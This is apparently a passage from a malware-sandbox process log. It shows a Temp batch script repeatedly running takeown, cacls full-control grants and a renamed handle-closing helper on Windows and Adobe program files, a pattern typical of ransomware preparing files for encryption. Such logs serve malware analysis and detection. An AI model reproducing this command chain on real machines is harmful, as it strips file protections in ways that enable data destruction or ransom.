- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"
    3⤵
    - Modifies file permissions
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui""
  2⤵
  PID:480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\NBMapTIP.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\JNTFiltr.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:452
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PDIALOG.exe" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PDIALOG.exe" -nobanner
      4⤵
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Music.jtp" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Music.jtp" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:452
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\es-ES\WinMail.exe.mui""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\es-ES\WinMail.exe.mui"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:452
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:232
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:804
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2044
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2036
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:208
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui"
    3⤵
    - Modifies file permissions
    PID:1580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  PID:1600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
    3⤵
    PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:956
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui""
  2⤵
  PID:1636
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:452
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui""
  2⤵
  PID:272
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui"
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:968
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:1968
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:1404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    PID:512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:820
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:652
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5i50wJie.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:384
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:1520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CnRDNN7F.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:1408
  - - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
      CnRDNN7F.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\CnRDNN7F.exe
    CnRDNN7F.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
